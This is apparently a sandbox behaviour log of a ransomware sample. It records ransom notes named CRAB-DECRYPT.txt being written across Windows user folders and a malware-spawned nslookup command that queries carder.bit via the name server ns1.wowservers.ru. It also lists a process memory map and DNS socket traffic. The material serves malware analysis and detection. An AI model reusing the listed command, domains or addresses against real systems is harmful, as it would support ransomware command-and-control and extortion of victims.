File Create filename = C:\Users\aETAdzjz\Videos\EJD1E7OJwGrA_\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Videos\EJD1E7OJwGrA_\4udnlrtpCkLpV\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Videos\NWaecIZZww\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Credentials\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\1NBUR4HR\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\6ASVN7J7\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\D68G7BIJ\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\KQMHSVKD\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Media\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\LocalLow\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\LocalLow\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Contacts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Cookies\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Desktop\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Favorites\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Favorites\Microsoft Websites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Favorites\MSN Websites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Favorites\Windows Live\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\My Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\NetHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Searches\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\SendTo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Default User\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Libraries\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Music\Sample Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Pictures\Sample Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Recorded TV\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Recorded TV\Sample Media\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\Public\Videos\Sample Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Process #27: nslookup.exe
10 18
»
Information Value
ID #27
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:03:07, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:02:13
OS Process Information
»
Information Value
PID 0x418
Parent PID 0x7cc (c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 44C
0x 464
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x00080000 0x00084fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x0018ffff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
private_0x0000000000250000 0x00250000 0x0035ffff Private Memory Readable, Writable True False False -
private_0x0000000000370000 0x00370000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000004d0000 0x004d0000 0x0050ffff Private Memory Readable, Writable True False False -
private_0x0000000000510000 0x00510000 0x0060ffff Private Memory Readable, Writable True False False -
private_0x0000000000700000 0x00700000 0x0073ffff Private Memory Readable, Writable True False False -
private_0x0000000000750000 0x00750000 0x0075ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000760000 0x00760000 0x008e7fff Pagefile Backed Memory Readable True False False -
nslookup.exe 0x009a0000 0x009bdfff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000009c0000 0x009c0000 0x00b40fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000b50000 0x00b50000 0x01f4ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01f50000 0x0221efff Memory Mapped File Readable False False False -
private_0x0000000002220000 0x02220000 0x0236ffff Private Memory Readable, Writable True False False -
private_0x0000000002220000 0x02220000 0x0231ffff Private Memory Readable, Writable True False False -
private_0x0000000002360000 0x02360000 0x0236ffff Private Memory Readable, Writable True False False -
wsock32.dll 0x735e0000 0x735e6fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x73600000 0x73637fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x73640000 0x73645fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x73650000 0x73654fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73660000 0x73667fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73670000 0x736abfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x736b0000 0x736c1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x736d0000 0x736dffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73760000 0x73765fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73770000 0x7377ffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73810000 0x73816fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73820000 0x7383bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73840000 0x73883fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x73dc0000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x73e70000 0x73e77fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75200000 0x7520bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75210000 0x7526ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x754f0000 0x7558cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75940000 0x759ebfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x759f0000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x75cf0000 0x75cf9fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76a50000 0x76a55fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76ab0000 0x76af5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76b00000 0x76b8ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76d90000 0x76da8fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76de0000 0x76e14fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76e80000 0x76f8ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76f90000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77050000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x770f0000 0x771bbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x771c0000 0x772affff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000772b0000 0x772b0000 0x773cefff Private Memory Readable, Writable, Executable True False False -
private_0x00000000773d0000 0x773d0000 0x774c9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x774d0000 0x77678fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x776b0000 0x7782ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x44c
10 18
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:54:17 (UTC) True 1
Fn
System Get Time type = Ticks, time = 13462 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x9a0000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = YKyd69q True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 81.4.163.122, 221.120.220.72, 197.254.118.42, 190.35.242.126 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 81.4.163.122, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 43, size_out = 43 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 81.4.163.122, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 81.4.163.122, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Fn
Data
